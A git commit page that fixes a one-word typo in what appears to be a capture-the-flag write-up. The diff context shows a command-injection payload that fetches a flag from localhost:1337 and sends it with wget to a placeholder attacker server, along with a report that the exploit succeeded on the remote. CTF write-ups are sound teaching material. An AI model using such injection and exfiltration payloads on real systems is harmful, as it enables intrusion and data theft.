aboutsummaryrefslogtreecommitdiffhomepage
diff options
context:
space:
mode:
authorTimber2024-06-02 16:40:53 +0200
committerTimber2024-06-02 16:40:53 +0200
commita146d5304e0ad04949e0f2f974ba982c26785c01 (patch)
treeb87b97dc87e9b11edbd184fac553fdfab1681ab5
parenta95b3d56a153b520a14a200c79e5e4a62ef1f6ed (diff)
Fix typo
-rw-r--r--even-more-flags.md2
1 files changed, 1 insertions, 1 deletions
diff --git a/even-more-flags.md b/even-more-flags.md
index 9cc1e85..d06fe2c 100644
--- a/even-more-flags.md
+++ b/even-more-flags.md
@@ -116,6 +116,6 @@ For that the idea is to read the flag and make an http request to some webserver
http:./ & wget <some-url-where-we-can-view-logs>?data=`wget localhost:1337/flag -O -`
```
-And indeed, if we run this in our docker, we can see the fake flag being submitted in the docker logs, and the fake flag arriving in our server docs.
+And indeed, if we run this in our docker, we can see the fake flag being submitted in the docker logs, and the fake flag arriving in our server logs.
If we now use this exploit url on the remote, we **receive our flag!**